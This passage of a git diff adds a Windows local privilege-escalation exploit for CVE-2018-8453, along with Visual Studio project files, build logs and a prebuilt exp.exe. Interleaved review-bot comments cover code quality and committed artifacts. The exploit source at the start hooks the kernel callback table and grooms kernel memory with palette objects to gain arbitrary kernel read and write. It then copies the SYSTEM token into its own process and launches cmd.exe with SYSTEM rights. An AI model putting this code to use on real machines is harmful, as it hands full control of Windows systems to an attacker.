+ //*(PULONG64)(SBTrackBUF + sizeof(ULONG64) + sizeof(ULONG64)) = MgrAddr + 0x79 - 8 ;
+ *(PULONG64)(SBTrackBUF + sizeof(ULONG64)) = MgrAddr + 0x16;
+ *(PULONG64)(SBTrackBUF + sizeof(ULONG64) + sizeof(ULONG64)) = MgrAddr + 0x16;
+}
+
+VOID ReadMem(ULONG64 Addr, DWORD len,PULONG64 ret) {
+ ULONG64 tmp = Addr;
+ SetPaletteEntries(hManager, 0, 2, (LPPALETTEENTRY)&tmp);
+ GetPaletteEntries(hWorker, 0, len, (LPPALETTEENTRY)ret);
+}
+
+ULONG64 GetNTOsBase()
+{
+ ULONG64 Bases[0x1000];
+ DWORD needed = 0;
+ ULONG64 krnlbase = 0;
+ if (EnumDeviceDrivers((LPVOID *)&Bases, sizeof(Bases), &needed)) {
+ krnlbase = Bases[0];
+ }
+ return krnlbase;
+}
+
+ULONG64 PsInitialSystemProcess()
+{
+ ULONG64 Module = (ULONG64)LoadLibraryA("ntoskrnl.exe");
+ ULONG64 Addr = (ULONG64)GetProcAddress((HMODULE)Module, "PsInitialSystemProcess");
+ FreeLibrary((HMODULE)Module);
+ ULONG64 res = 0;
+ ULONG64 ntOsBase = GetNTOsBase();
+ if (ntOsBase) {
+ ReadMem(Addr - Module + ntOsBase, 2 ,&res);
+ }
+ return res;
+}
+
+ULONG64 PsGetCurrentProcess(QWORD sysEPS)
+{
+ ULONG64 pEPROCESS = sysEPS;
+ ULONG64 Flink = 0;
+ ULONG64 PID = 0;
+ ReadMem(pEPROCESS + gConfig.UniqueProcessIdOffset + sizeof(ULONG64), 2, &Flink);
+ while (TRUE) {
+ pEPROCESS = Flink - gConfig.UniqueProcessIdOffset - sizeof(ULONG64);
+ ReadMem(pEPROCESS + gConfig.UniqueProcessIdOffset, 2,&PID);
+ if (GetCurrentProcessId() == PID) {
+ return pEPROCESS;
+ }
+ ReadMem(pEPROCESS + gConfig.UniqueProcessIdOffset + sizeof(ULONG64), 2, &Flink);
+ }
+}
+
+ULONG64 AllocSBTrackMem() {
+
+ TCHAR strMenuName[98];
+ memset(strMenuName, 0x55, 98);
+
+ TCHAR strclassname[0x32] = { 0x11 };
+ HMODULE hInst = GetModuleHandleA(0);
+ WNDCLASSEX wnd = { 0x0 };
+ wnd.cbSize = sizeof(wnd);
+ wnd.lpszClassName = strclassname;
+ wnd.lpfnWndProc = DefWindowProc;
+ wnd.hInstance = hInst;
+ wnd.lpszMenuName = strMenuName;
+ RegisterClassExW(&wnd);
+
+ hReuseWND = CreateWindowEx(
+ 0,
+ wnd.lpszClassName,
+ TEXT("WORDS"),
+ 0xcf0000,
+ CW_USEDEFAULT,
+ CW_USEDEFAULT,
+ CW_USEDEFAULT,
+ CW_USEDEFAULT,
+ NULL, NULL, hInst, NULL);
+ PTHRDESKHEAD tagWND = (PTHRDESKHEAD)pHmValidateHandle(hReuseWND, 1);
+ ULONG64 p = (ULONG64)tagWND;
+ ULONG64 kernellpSelp = tagWND->pSelf;
+ ULONG64 ulClientDelta = kernellpSelp - p;
+ ULONG64 kernelTagCLS = *(ULONG64*)(p + 0xa8);
+ CurrentTagCLSAddr = kernelTagCLS;
+ ULONG64 userTagCLS = kernelTagCLS - ulClientDelta;
+ ULONG64 tagCLS_lpszMenuName = (ULONG64)(*((ULONG64*)(userTagCLS + 0x98)));
+ printf("[*] MenuName: 0x%p\n", tagCLS_lpszMenuName);
+ return tagCLS_lpszMenuName;
+}
+
+VOID SetupManger()
+{
+ QWORD buf[0x20];
+ ZeroMemory(buf, 0x20 * sizeof(QWORD));
+ GetPaletteEntries(hManager, 0x3fc, 8, (LPPALETTEENTRY)buf);
+ buf[0] = MgrAddr;
+ SetPaletteEntries(hManager, 0x3fc, 8, (LPPALETTEENTRY)buf);
+ GetPaletteEntries(hWorker, 0, 0x20, (LPPALETTEENTRY)buf);
+ buf[3] = 0x000003d600000501;
+ buf[4] += 1;
+ buf[15] = WrkAddr + 0x78;
+ SetPaletteEntries(hWorker, 0, 0x20, (LPPALETTEENTRY)buf);
+}
+
+void GetSystem()
+{
+ ULONG64 SelfToken = 0;
+ ULONG64 SystemToken = 0;
+ ULONG64 SystemEPS;
+ ULONG64 CurrentEPS;
+ ULONG64 pKernelHandleTable;
+
+ STARTUPINFO stStartUpInfo = { sizeof(stStartUpInfo) };
+ PROCESS_INFORMATION pProcessInfo;
+ WCHAR cmd[] = L"c:\\\\windows\\\\system32\\\\cmd.exe";
+
+ SystemEPS = PsInitialSystemProcess();
+ CurrentEPS = PsGetCurrentProcess(SystemEPS);
+
+ ReadMem(SystemEPS + gConfig.TokenOffset, 2, &SystemToken);
+ ReadMem(CurrentEPS + gConfig.TokenOffset, 2, &SelfToken);
+
+ SetPaletteEntries(hManager, 0, 2, (LPPALETTEENTRY)(CurrentEPS + gConfig.TokenOffset));
+ SetPaletteEntries(hWorker, 0, 2, (LPPALETTEENTRY)&SystemToken);
+
+ Sleep(500);
+ printf("[*] Swaping shell.\n\n");
+ ZeroMemory(&stStartUpInfo, sizeof(STARTUPINFO));
+ stStartUpInfo.cb = sizeof(STARTUPINFO);
+ stStartUpInfo.dwFlags = STARTF_USESHOWWINDOW;
+ stStartUpInfo.wShowWindow = 1;
+ CreateProcess(cmd, NULL, NULL, NULL, FALSE, NULL, NULL, NULL, &stStartUpInfo, &pProcessInfo);
+ Sleep(500);
+
+ SetPaletteEntries(hWorker, 0, 2, (LPPALETTEENTRY)&SelfToken);
+
+}
+
+void fnDWORDCallBack(PULONG64 msg)
+{
+ if (bMSGSENT && *msg) {
+ bMSGSENT = FALSE;
+ DestroyWindow(hMainWND);
+ }
+
+ if (*msg && (*(msg + 1) == 0x70) && (*((PULONG64)(*msg)) == (ULONG64)hMainWND)) {
+ SendMessage(hSBWNDnew, WM_CANCELMODE, 0, 0);
+ DestroyAcceleratorTable(hAccel);
+ for (int i = 1001; i < 3000; i++) {
+ SetLinkedUFIs(hDC_Writer[i], (PULONG64)SBTrackBUF, 0xD);
+ }
+ }
+ fnDWORD(msg);
+}
+
+void fnClientFreeWindowClassExtraBytesCallBack(PULONG64 msg)
+{
+ if (*(PULONG64)*((PULONG64)*(msg - 11)) == (ULONG64)hMainWND) {
+ hSBWNDnew = CreateWindowEx(0, L"ScrollBar", L"SB", SWP_HIDEWINDOW | SB_HORZ, 0, 0, 0, 0, NULL, NULL, NULL, NULL);
+ printf("[*] Set Window FNID.\n");
+ SetWindowFNID(hMainWND, 0x2A1);
+ SetCapture(hSBWNDnew);
+ }
+ fnClientFreeWindowClassExtraBytes(msg);
+}
+
+int main()
+{
+ printf("////////////////////////////////////////////////////////\n");
+ printf("// //\n");
+ printf("// CVE-2018-8453 EXPLOIT //\n");
+ printf("// Date : 2019/1/15 //\n");
+ printf("// Author: ze0r //\n");
+ printf("////////////////////////////////////////////////////////\n\n");
+
+ DWORD OldProtect = 0;
+ PULONG64 CallbackTb = GetKernelCallbackTableBase();
+
+ VirtualProtect(CallbackTb, 512, PAGE_READWRITE, &OldProtect);
+ CallbackTb += 2;
+ fnDWORD = (fct_fnDispatch64)*CallbackTb;
+ *CallbackTb = (ULONG64)fnDWORDCallBack;
+
+ CallbackTb += 124;
+ fnClientFreeWindowClassExtraBytes = (fct_fnDispatch64)*CallbackTb;
+ *CallbackTb = (ULONG64)fnClientFreeWindowClassExtraBytesCallBack;
+ VirtualProtect(CallbackTb, 512, OldProtect, &OldProtect);
+
+ FindHMValidateHandle();
+ memset(MenuName, 0x41, 0xfe0);
+ MenuName[0xfe0] = 0;
+
+ WNDCLASSEXW wndClass = { 0 };
+ wndClass = { 0 };
+ wndClass.cbSize = sizeof(WNDCLASSEXW);
+ wndClass.lpfnWndProc = DefWindowProc;
+ wndClass.cbClsExtra = 0;
+ wndClass.cbWndExtra = 1;
+ wndClass.hInstance = GetModuleHandleA(NULL);
+ wndClass.lpszMenuName = NULL;
+ wndClass.lpszClassName = L"WNDCLASSMAIN";
+
+ RegisterClassExW(&wndClass);
+ printf("[*] CreateWindow.\n");
+ hMainWND = CreateWindowW(L"WNDCLASSMAIN", L"CVE", WS_DISABLED, 0, 0, 0, 0, nullptr, nullptr, GetModuleHandleA(NULL), nullptr);
+ hSBWND = CreateWindowEx(0, L"ScrollBar", L"SB", WS_CHILD | WS_VISIBLE | SBS_HORZ, 0, 0, 3, 3, hMainWND, NULL, GetModuleHandleA(NULL), NULL);
+
+ printf("[*] Deploy Memory.\n");
+ for (int i = 0; i < 3000; i++) {
+ hDC_Writer[i] = CreateCompatibleDC(NULL);
+ }
+ hAccel = CreateAcceleratorTableW(acckey, 12);
+ GetMangerAndWorker();
+ printf("[*] SendMessage.\n");
+ bMSGSENT = TRUE;
+ SendMessage(hSBWND, WM_LBUTTONDOWN, 0, 0x00020002);
+
+ ULONG64 pHDCLinkData = AllocSBTrackMem();
+
+ SetupManger();
+ GetSystem();
+
+ QWORD buf[14];
+ ULONG64 zero = 0;
+ ZeroMemory(buf, 14 * sizeof(ULONG64));
+ ReadMem(pHDCLinkData, 28, buf);
+ if (buf[12] == 0x4444444400005555) {
+ CurrentTagCLSAddr += 0x98;
+ SetPaletteEntries(hManager, 0, 2, (LPPALETTEENTRY)&CurrentTagCLSAddr);
+ SetPaletteEntries(hWorker, 0, 2, (LPPALETTEENTRY)&zero);
+
+ DestroyWindow(hReuseWND);
+ for (int i = 0; i < 3000; i++) {
+ DeleteObject(hDC_Writer);
+ }
+ }
+ else {
+ Sleep(3600 * 1000);
+ }
+ return TRUE;
+}
+
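Review bot: `DeleteObject(hDC_Writer)` in the cleanup loop at the end of `main` passes the array itself instead of `hDC_Writer[i]`, so the loop runs 3000 times on one invalid handle and none of the DCs created earlier are released; the cleanup in `GetMangerAndWorker` has the mirror problem, freeing `Padding[i]` down to index 1, which starts at an index the loop never assigned (it breaks before the assignment) and skips `Padding[0]`. Other points visible in this hunk: `FindHMValidateHandle` does its arithmetic in `unsigned int` and truncates `pIsMenu` and `hUser32` to 32 bits on x64 (the committed exp.log flags this as C4311/C4302), and `ULONG_PTR` is the right type; `printf("%p", ...)` with a `ULONG64` argument is undefined and also flagged (C4477); `pKernelHandleTable` in `GetSystem` is unused (C4101); `GetMangerPalette` and `GetWorkerPalette` are the same function differing only in which global they assign; the `LOGPALETTE` buffers `malloc`'d in `CreatePaletteOfSize` are never freed; `gConfig = { 0x2e0, 0x358 }` are build-specific offsets with no comment saying which build; `alloccate_free_window` and `GetMangerAndWorker` are misspelled; the failure branch at the end (`Sleep(3600 * 1000)`) parks the process for an hour instead of reporting which check failed and exiting non-zero; and `return TRUE` exits with status 1 on success.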
diff --git a/CVE-2018-8453/exp_x64_palette_length/exp/exp.vcxproj b/CVE-2018-8453/exp_x64_palette_length/exp/exp.vcxproj
new file mode 100644
index 0000000..a14a258
--- /dev/null
+++ b/CVE-2018-8453/exp_x64_palette_length/exp/exp.vcxproj
@@ -0,0 +1,169 @@
+
+
+
+
+ Debug
+ Win32
+
+
+ Release
+ Win32
+
+
+ Debug
+ x64
+
+
+ Release
+ x64
+
+
+
+ {34B233E1-7209-49FD-8DB8-69A9C75906D6}
+ Win32Proj
+ exp
+ 8.1
+
+
+
+ Application
+ true
+ v140
+ Unicode
+
+
+ Application
+ false
+ v140
+ true
+ Unicode
+
+
+ Application
+ true
+ v140
+ Unicode
+
+
+ Application
+ false
+ v140
+ true
+ Unicode
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ true
+
+
+ true
+
+
+ false
+
+
+ false
+
+
+
+ Use
+ Level3
+ Disabled
+ WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)
+ true
+
+
+ Console
+ true
+
+
+
+
+ Use
+ Level3
+ Disabled
+ _DEBUG;_CONSOLE;%(PreprocessorDefinitions)
+ true
+
+
+ Console
+ true
+
+
+
+
+ Level3
+ Use
+ MaxSpeed
+ true
+ true
+ WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
+ true
+
+
+ Console
+ true
+ true
+ true
+
+
+
+
+ Level3
+ Use
+ MaxSpeed
+ true
+ true
+ NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
+ true
+ MultiThreaded
+
+
+ Console
+ true
+ true
+ true
+
+
+
+
+
+
+
+
+
+
+
+
+ Create
+ Create
+ Create
+ Create
+
+
+
+
+
+
+
+
+
+
\ No newline at end of file
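Review bot: only the Release|x64 configuration sets `MultiThreaded` (static CRT); the other three do not, and Release|Win32 in the sibling exp-x86_pool_fengshui project does set it, so the two projects' runtime settings disagree for no stated reason and the Debug builds here depend on the debug VC140 runtime. Align the four configurations across both projects, or record why they differ.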
diff --git a/CVE-2018-8453/exp_x64_palette_length/exp/exp.vcxproj.filters b/CVE-2018-8453/exp_x64_palette_length/exp/exp.vcxproj.filters
new file mode 100644
index 0000000..48effbf
--- /dev/null
+++ b/CVE-2018-8453/exp_x64_palette_length/exp/exp.vcxproj.filters
@@ -0,0 +1,41 @@
+
+
+
+
+ {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
+ cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
+
+
+ {93995380-89BD-4b04-88EB-625FBE52EBFB}
+ h;hh;hpp;hxx;hm;inl;inc;xsd
+
+
+ {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
+ rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
+
+
+
+
+
+
+
+ 头文件
+
+
+ 头文件
+
+
+
+
+ 源文件
+
+
+ 源文件
+
+
+
+
+ 源文件
+
+
+
\ No newline at end of file
diff --git a/CVE-2018-8453/exp_x64_palette_length/exp/stdafx.cpp b/CVE-2018-8453/exp_x64_palette_length/exp/stdafx.cpp
new file mode 100644
index 0000000..f026e66
--- /dev/null
+++ b/CVE-2018-8453/exp_x64_palette_length/exp/stdafx.cpp
@@ -0,0 +1,8 @@
+// stdafx.cpp : ֻ�����������ļ���Դ�ļ�
+// exp.pch ����ΪԤ����ͷ
+// stdafx.obj ������Ԥ����������Ϣ
+
+#include "stdafx.h"
+
+// TODO: �� STDAFX.H �������κ�����ĸ���ͷ�ļ���
+//�������ڴ��ļ�������
diff --git a/CVE-2018-8453/exp_x64_palette_length/exp/stdafx.h b/CVE-2018-8453/exp_x64_palette_length/exp/stdafx.h
new file mode 100644
index 0000000..baa4bbc
--- /dev/null
+++ b/CVE-2018-8453/exp_x64_palette_length/exp/stdafx.h
@@ -0,0 +1,15 @@
+// stdafx.h : ��ϵͳ�����ļ��İ����ļ���
+// ���Ǿ���ʹ�õ��������ĵ�
+// �ض�����Ŀ�İ����ļ�
+//
+
+#pragma once
+
+#include "targetver.h"
+
+#include
+#include
+
+
+
+// TODO: �ڴ˴����ó�����Ҫ������ͷ�ļ�
diff --git a/CVE-2018-8453/exp_x64_palette_length/exp/targetver.h b/CVE-2018-8453/exp_x64_palette_length/exp/targetver.h
new file mode 100644
index 0000000..416cebf
--- /dev/null
+++ b/CVE-2018-8453/exp_x64_palette_length/exp/targetver.h
@@ -0,0 +1,8 @@
+#pragma once
+
+// ���� SDKDDKVer.h ��������õ���߰汾�� Windows ƽ̨��
+
+// ���ҪΪ��ǰ�� Windows ƽ̨����Ӧ�ó�������� WinSDKVer.h������
+// �� _WIN32_WINNT ������ΪҪ֧�ֵ�ƽ̨��Ȼ���ٰ��� SDKDDKVer.h��
+
+#include
diff --git a/CVE-2018-8453/exp_x64_palette_length/exp/x64/Release/_asm.obj b/CVE-2018-8453/exp_x64_palette_length/exp/x64/Release/_asm.obj
new file mode 100644
index 0000000..64aa53c
Binary files /dev/null and b/CVE-2018-8453/exp_x64_palette_length/exp/x64/Release/_asm.obj differ
diff --git a/CVE-2018-8453/exp_x64_palette_length/exp/x64/Release/exp.Build.CppClean.log b/CVE-2018-8453/exp_x64_palette_length/exp/x64/Release/exp.Build.CppClean.log
new file mode 100644
index 0000000..94d0dcc
--- /dev/null
+++ b/CVE-2018-8453/exp_x64_palette_length/exp/x64/Release/exp.Build.CppClean.log
@@ -0,0 +1,17 @@
+c:\users\ze0r\desktop\exp_x64_palette_length\exp\x64\release\exp.pch
+c:\users\ze0r\desktop\exp_x64_palette_length\exp\x64\release\vc140.pdb
+c:\users\ze0r\desktop\exp_x64_palette_length\exp\x64\release\stdafx.obj
+c:\users\ze0r\desktop\exp_x64_palette_length\exp\x64\release\exp.obj
+c:\users\ze0r\desktop\exp_x64_palette_length\exp\x64\release\_asm.obj
+c:\users\ze0r\desktop\exp_x64_palette_length\x64\release\exp.pdb
+c:\users\ze0r\desktop\exp_x64_palette_length\exp\x64\release\exp.tlog\cl.command.1.tlog
+c:\users\ze0r\desktop\exp_x64_palette_length\exp\x64\release\exp.tlog\cl.read.1.tlog
+c:\users\ze0r\desktop\exp_x64_palette_length\exp\x64\release\exp.tlog\cl.write.1.tlog
+c:\users\ze0r\desktop\exp_x64_palette_length\exp\x64\release\exp.tlog\exp.write.1u.tlog
+c:\users\ze0r\desktop\exp_x64_palette_length\exp\x64\release\exp.tlog\link-cvtres.read.1.tlog
+c:\users\ze0r\desktop\exp_x64_palette_length\exp\x64\release\exp.tlog\link-cvtres.write.1.tlog
+c:\users\ze0r\desktop\exp_x64_palette_length\exp\x64\release\exp.tlog\link-rc.read.1.tlog
+c:\users\ze0r\desktop\exp_x64_palette_length\exp\x64\release\exp.tlog\link-rc.write.1.tlog
+c:\users\ze0r\desktop\exp_x64_palette_length\exp\x64\release\exp.tlog\link.command.1.tlog
+c:\users\ze0r\desktop\exp_x64_palette_length\exp\x64\release\exp.tlog\link.read.1.tlog
+c:\users\ze0r\desktop\exp_x64_palette_length\exp\x64\release\exp.tlog\link.write.1.tlog
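Review bot: exp.Build.CppClean.log is an MSBuild output artifact, and every line in it is an absolute path under `c:\users\ze0r\desktop\`, so committing it publishes the author's local username and directory layout along with content that changes on every build. Remove it together with the rest of `exp/x64/Release/`, and ignore `*.log`, `*.tlog`, `*.obj`, `*.pch`, `*.pdb` and the `x64/` output directories.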
diff --git a/CVE-2018-8453/exp_x64_palette_length/exp/x64/Release/exp.log b/CVE-2018-8453/exp_x64_palette_length/exp/x64/Release/exp.log
new file mode 100644
index 0000000..ea5b9f3
--- /dev/null
+++ b/CVE-2018-8453/exp_x64_palette_length/exp/x64/Release/exp.log
@@ -0,0 +1,18 @@
+ Assembling _asm.asm...
+ stdafx.cpp
+ exp.cpp
+exp.cpp(93): warning C4311: “类型转换”: 从“BYTE *”到“unsigned int”的指针截断
+exp.cpp(93): warning C4302: “类型转换”: 从“BYTE *”到“unsigned int”截断
+exp.cpp(93): warning C4311: “类型转换”: 从“HMODULE”到“unsigned int”的指针截断
+exp.cpp(93): warning C4302: “类型转换”: 从“HMODULE”到“unsigned int”截断
+exp.cpp(192): warning C4477: “printf”: 格式字符串“%p”需要类型“void *”的参数,但可变参数 1 拥有了类型“ULONG64”
+exp.cpp(192): warning C4477: “printf”: 格式字符串“%p”需要类型“void *”的参数,但可变参数 2 拥有了类型“ULONG64”
+exp.cpp(282): warning C4477: “printf”: 格式字符串“%p”需要类型“void *”的参数,但可变参数 1 拥有了类型“ULONG64”
+exp.cpp(306): warning C4101: “pKernelHandleTable”: 未引用的局部变量
+ 正在生成代码
+ 0 of 20 functions ( 0.0%) were compiled, the rest were copied from previous compilation.
+ 0 functions were new in current compilation
+ 0 functions had inline decision re-evaluated but remain unchanged
+ 已完成代码的生成
+ exp.vcxproj -> C:\Users\ze0r\Desktop\exp_x64_palette_length\x64\Release\exp.exe
+ exp.vcxproj -> C:\Users\ze0r\Desktop\exp_x64_palette_length\x64\Release\exp.pdb (Full PDB)
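Review bot: exp.log is a build artifact that should not be committed, but before it goes it is a useful checklist: the C4311/C4302 lines at exp.cpp(93) are the pointer truncation in `FindHMValidateHandle`, the C4477 lines at 192 and 282 are the `%p` / `ULONG64` mismatch, and C4101 at 306 is the unused `pKernelHandleTable`. Fix those in exp.cpp rather than carrying the warnings in a log; the `0 of 20 functions ... copied from previous compilation` lines also show this log came from an incremental build on the author's machine, not a clean one.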
diff --git a/CVE-2018-8453/exp_x64_palette_length/exp/x64/Release/exp.obj b/CVE-2018-8453/exp_x64_palette_length/exp/x64/Release/exp.obj
new file mode 100644
index 0000000..c602fbd
Binary files /dev/null and b/CVE-2018-8453/exp_x64_palette_length/exp/x64/Release/exp.obj differ
diff --git a/CVE-2018-8453/exp_x64_palette_length/exp/x64/Release/exp.pch b/CVE-2018-8453/exp_x64_palette_length/exp/x64/Release/exp.pch
new file mode 100644
index 0000000..9de3777
Binary files /dev/null and b/CVE-2018-8453/exp_x64_palette_length/exp/x64/Release/exp.pch differ
diff --git a/CVE-2018-8453/exp_x64_palette_length/exp/x64/Release/exp.tlog/CL.command.1.tlog b/CVE-2018-8453/exp_x64_palette_length/exp/x64/Release/exp.tlog/CL.command.1.tlog
new file mode 100644
index 0000000..67c22b8
Binary files /dev/null and b/CVE-2018-8453/exp_x64_palette_length/exp/x64/Release/exp.tlog/CL.command.1.tlog differ
diff --git a/CVE-2018-8453/exp_x64_palette_length/exp/x64/Release/exp.tlog/CL.read.1.tlog b/CVE-2018-8453/exp_x64_palette_length/exp/x64/Release/exp.tlog/CL.read.1.tlog
new file mode 100644
index 0000000..5d13205
Binary files /dev/null and b/CVE-2018-8453/exp_x64_palette_length/exp/x64/Release/exp.tlog/CL.read.1.tlog differ
diff --git a/CVE-2018-8453/exp_x64_palette_length/exp/x64/Release/exp.tlog/CL.write.1.tlog b/CVE-2018-8453/exp_x64_palette_length/exp/x64/Release/exp.tlog/CL.write.1.tlog
new file mode 100644
index 0000000..2a6bfa9
Binary files /dev/null and b/CVE-2018-8453/exp_x64_palette_length/exp/x64/Release/exp.tlog/CL.write.1.tlog differ
diff --git a/CVE-2018-8453/exp_x64_palette_length/exp/x64/Release/exp.tlog/exp.lastbuildstate b/CVE-2018-8453/exp_x64_palette_length/exp/x64/Release/exp.tlog/exp.lastbuildstate
new file mode 100644
index 0000000..5875596
--- /dev/null
+++ b/CVE-2018-8453/exp_x64_palette_length/exp/x64/Release/exp.tlog/exp.lastbuildstate
@@ -0,0 +1,2 @@
+#TargetFrameworkVersion=v4.0:PlatformToolSet=v140:EnableManagedIncrementalBuild=false:VCToolArchitecture=Native32Bit:WindowsTargetPlatformVersion=8.1
+Release|x64|C:\Users\ze0r\Desktop\exp_x64_palette_length\|
diff --git a/CVE-2018-8453/exp_x64_palette_length/exp/x64/Release/exp.tlog/exp.write.1u.tlog b/CVE-2018-8453/exp_x64_palette_length/exp/x64/Release/exp.tlog/exp.write.1u.tlog
new file mode 100644
index 0000000..fdef7ef
Binary files /dev/null and b/CVE-2018-8453/exp_x64_palette_length/exp/x64/Release/exp.tlog/exp.write.1u.tlog differ
diff --git a/CVE-2018-8453/exp_x64_palette_length/exp/x64/Release/exp.tlog/link.command.1.tlog b/CVE-2018-8453/exp_x64_palette_length/exp/x64/Release/exp.tlog/link.command.1.tlog
new file mode 100644
index 0000000..7773d58
Binary files /dev/null and b/CVE-2018-8453/exp_x64_palette_length/exp/x64/Release/exp.tlog/link.command.1.tlog differ
diff --git a/CVE-2018-8453/exp_x64_palette_length/exp/x64/Release/exp.tlog/link.read.1.tlog b/CVE-2018-8453/exp_x64_palette_length/exp/x64/Release/exp.tlog/link.read.1.tlog
new file mode 100644
index 0000000..0e7bfd3
Binary files /dev/null and b/CVE-2018-8453/exp_x64_palette_length/exp/x64/Release/exp.tlog/link.read.1.tlog differ
diff --git a/CVE-2018-8453/exp_x64_palette_length/exp/x64/Release/exp.tlog/link.write.1.tlog b/CVE-2018-8453/exp_x64_palette_length/exp/x64/Release/exp.tlog/link.write.1.tlog
new file mode 100644
index 0000000..cdf252f
Binary files /dev/null and b/CVE-2018-8453/exp_x64_palette_length/exp/x64/Release/exp.tlog/link.write.1.tlog differ
diff --git a/CVE-2018-8453/exp_x64_palette_length/exp/x64/Release/stdafx.obj b/CVE-2018-8453/exp_x64_palette_length/exp/x64/Release/stdafx.obj
new file mode 100644
index 0000000..230a86a
Binary files /dev/null and b/CVE-2018-8453/exp_x64_palette_length/exp/x64/Release/stdafx.obj differ
diff --git a/CVE-2018-8453/exp_x64_palette_length/exp/x64/Release/vc140.pdb b/CVE-2018-8453/exp_x64_palette_length/exp/x64/Release/vc140.pdb
new file mode 100644
index 0000000..0b0508d
Binary files /dev/null and b/CVE-2018-8453/exp_x64_palette_length/exp/x64/Release/vc140.pdb differ
diff --git a/CVE-2018-8453/exp_x64_palette_length/ipch/EXP-7a579913/EXP-4c98b977.ipch b/CVE-2018-8453/exp_x64_palette_length/ipch/EXP-7a579913/EXP-4c98b977.ipch
new file mode 100644
index 0000000..070307e
Binary files /dev/null and b/CVE-2018-8453/exp_x64_palette_length/ipch/EXP-7a579913/EXP-4c98b977.ipch differ
diff --git a/CVE-2018-8453/exp_x64_palette_length/ipch/EXP-7a579913/EXP-4dbe2bb1.ipch b/CVE-2018-8453/exp_x64_palette_length/ipch/EXP-7a579913/EXP-4dbe2bb1.ipch
new file mode 100644
index 0000000..5f7d0c6
Binary files /dev/null and b/CVE-2018-8453/exp_x64_palette_length/ipch/EXP-7a579913/EXP-4dbe2bb1.ipch differ
diff --git a/CVE-2018-8453/exp_x64_palette_length/ipch/EXP-7a579913/EXP-c8e60a99.ipch b/CVE-2018-8453/exp_x64_palette_length/ipch/EXP-7a579913/EXP-c8e60a99.ipch
new file mode 100644
index 0000000..532b888
Binary files /dev/null and b/CVE-2018-8453/exp_x64_palette_length/ipch/EXP-7a579913/EXP-c8e60a99.ipch differ
diff --git a/CVE-2018-8453/exp_x64_palette_length/ipch/EXP-a3e8b7c3/EXP-4dbe2bb1.ipch b/CVE-2018-8453/exp_x64_palette_length/ipch/EXP-a3e8b7c3/EXP-4dbe2bb1.ipch
new file mode 100644
index 0000000..367ec86
Binary files /dev/null and b/CVE-2018-8453/exp_x64_palette_length/ipch/EXP-a3e8b7c3/EXP-4dbe2bb1.ipch differ
diff --git a/CVE-2018-8453/exp_x64_palette_length/x64/Release/exp.exe b/CVE-2018-8453/exp_x64_palette_length/x64/Release/exp.exe
new file mode 100644
index 0000000..c319701
Binary files /dev/null and b/CVE-2018-8453/exp_x64_palette_length/x64/Release/exp.exe differ
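Review bot: everything in this run of files (exp.tlog/*, stdafx.obj, vc140.pdb, ipch/*.ipch, x64/Release/exp.exe) is Visual Studio build and IntelliSense output for the exp_x64_palette_length variant and should be git-ignored rather than committed; if a prebuilt exp.exe is meant to be distributed, record its SHA-256 and the Windows build it targets in the README so a user can verify what they are about to run.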
diff --git a/CVE-2018-8453/exp_x64_palette_paddress/.vs/exp/v14/.suo b/CVE-2018-8453/exp_x64_palette_paddress/.vs/exp/v14/.suo
new file mode 100644
index 0000000..4c1e4f3
Binary files /dev/null and b/CVE-2018-8453/exp_x64_palette_paddress/.vs/exp/v14/.suo differ
diff --git a/CVE-2018-8453/exp_x64_palette_paddress/exp.VC.db b/CVE-2018-8453/exp_x64_palette_paddress/exp.VC.db
new file mode 100644
index 0000000..1da6474
Binary files /dev/null and b/CVE-2018-8453/exp_x64_palette_paddress/exp.VC.db differ
diff --git a/CVE-2018-8453/exp_x64_palette_paddress/exp.sln b/CVE-2018-8453/exp_x64_palette_paddress/exp.sln
new file mode 100644
index 0000000..49eb848
--- /dev/null
+++ b/CVE-2018-8453/exp_x64_palette_paddress/exp.sln
@@ -0,0 +1,28 @@
+
+Microsoft Visual Studio Solution File, Format Version 12.00
+# Visual Studio 14
+VisualStudioVersion = 14.0.25420.1
+MinimumVisualStudioVersion = 10.0.40219.1
+Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "exp", "exp\exp.vcxproj", "{34B233E1-7209-49FD-8DB8-69A9C75906D6}"
+EndProject
+Global
+ GlobalSection(SolutionConfigurationPlatforms) = preSolution
+ Debug|x64 = Debug|x64
+ Debug|x86 = Debug|x86
+ Release|x64 = Release|x64
+ Release|x86 = Release|x86
+ EndGlobalSection
+ GlobalSection(ProjectConfigurationPlatforms) = postSolution
+ {34B233E1-7209-49FD-8DB8-69A9C75906D6}.Debug|x64.ActiveCfg = Debug|x64
+ {34B233E1-7209-49FD-8DB8-69A9C75906D6}.Debug|x64.Build.0 = Debug|x64
+ {34B233E1-7209-49FD-8DB8-69A9C75906D6}.Debug|x86.ActiveCfg = Debug|Win32
+ {34B233E1-7209-49FD-8DB8-69A9C75906D6}.Debug|x86.Build.0 = Debug|Win32
+ {34B233E1-7209-49FD-8DB8-69A9C75906D6}.Release|x64.ActiveCfg = Release|x64
+ {34B233E1-7209-49FD-8DB8-69A9C75906D6}.Release|x64.Build.0 = Release|x64
+ {34B233E1-7209-49FD-8DB8-69A9C75906D6}.Release|x86.ActiveCfg = Release|Win32
+ {34B233E1-7209-49FD-8DB8-69A9C75906D6}.Release|x86.Build.0 = Release|Win32
+ EndGlobalSection
+ GlobalSection(SolutionProperties) = preSolution
+ HideSolutionNode = FALSE
+ EndGlobalSection
+EndGlobal
diff --git a/CVE-2018-8453/exp_x64_palette_paddress/exp/ReadMe.txt b/CVE-2018-8453/exp_x64_palette_paddress/exp/ReadMe.txt
new file mode 100644
index 0000000..5b66131
--- /dev/null
+++ b/CVE-2018-8453/exp_x64_palette_paddress/exp/ReadMe.txt
@@ -0,0 +1,30 @@
+========================================================================
+ 控制台应用程序:exp 项目概述
+========================================================================
+
+应用程序向导已为您创建了此 exp 应用程序。
+
+本文件概要介绍组成 exp 应用程序的每个文件的内容。
+
+
+exp.vcxproj
